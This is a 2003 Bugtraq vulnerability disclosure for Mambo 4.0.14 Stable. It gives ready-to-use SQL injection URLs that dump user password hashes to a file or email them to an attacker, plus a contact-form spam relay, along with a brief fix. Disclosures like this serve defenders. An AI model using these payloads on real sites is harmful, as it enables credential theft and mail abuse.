Several Mambo 4.0.14 Stable Exploits

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Several Mambo 4.0.14 Stable Exploits
From: Lifo Fifo <lifofifo20@xxxxxxxxx>
Date: 18 Sep 2003 05:25:19 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Product : Mambo 4.0.14 Stable
Website : http://www.mamboserver.com/
Status : Vendor notified via email
Imapct : Search for "Mambo Open Source is Free Software released under the
GNU/GPL License." (with quotes) returned more than 500 results.
Credit : lifofifo, hackingzone.org
Originally posted at : http://www.hackingzone.org

First of all, you will get a bunch of error when you try to open banners.php
without any arguments. This does reveal some vital information like path on the
server. This information is very important when using "into outfile" feature of
MySQL.

Now,

* First Exploit

http://localhost/mambo/banners.php?op=click&bid=100 UNION select password from
mos_users where 1=1 into outfile 'c:/apache2/htdocs/mos.txt'

Here it's required that magic_quotes_gpc is turned off. And MySQL 4.x is
running. Because older versions don't support UNION function.

There are other cases of SQL Injection there. But they won't be a trouble if
you have magic_quotes_gpc turned on.

* Second Exploit

This one will work in all the cases. No matter
magic_quotes_gpc/register_globals are on/off. The bug is in
"emailfriend/emailarticle.php" file. In this file, the variable $id is not
checked. Therefore, it is possibgle to get the md5() password emailed to you.
Check the following,

http://localhost/mambo/emailfriend/emailarticle.php?submit=submit&email=lifofifo@xxxxxxxxxxxxxxx&youremail=webmaster@xxxxxxxxxxxxxxx&id=100
UNION select username,email,password from mos_users where id=1

In this case, username, md5() hashed password and email address of user with id
1 will get deliverd to lifofifo@xxxxxxxxxxxxxxxx

Note : The server needs to using MySQL 4.x

Fix : Add the follwing lines on the top of the "emailfriend/emailarticle.php"
script.
----
if(!is_numeric($id))
die("Hacking Attempt");
----

Note : Same patch should also be applied to "emailfriend/emailfaq.php"

* Third Exploit : Anonymous Emailer

In contact.php file, there is a function call like "sendmail($text, $from,
$name, $email_to, $sitename);". You can pass variables from the url. So if you
open it like,

http://localhost/mambo/contact.php?op=sendmail&text=this is
spam&from=none&name=Admin&email_to=lifofifo@xxxxxxxxxxxxxxx&sitename=hackingzone.org

It will send email to lifofifo@xxxxxxxxxxxxxxx from "None".

And this is really enough to give your site a bad name. One can spam from YOUR
own site. Becase IP of the email sender and IP of your site will be same and
therefor the integrity of the message won't be a doubt.

This will also work irrespective of magic_quotes_gpc and register_globals.

-lifofifo
http://www.hackingzone.org/

Prev by Date: [SECURITY] [DSA-384-1] New sendmail packages fix buffer overflows
Next by Date: MDKSA-2003:092 - Updated sendmail packages fix buffer overflow vulnerability
Previous by thread: [SECURITY] [DSA-384-1] New sendmail packages fix buffer overflows
Next by thread: MDKSA-2003:092 - Updated sendmail packages fix buffer overflow vulnerability
Index(es):
- Date
- Thread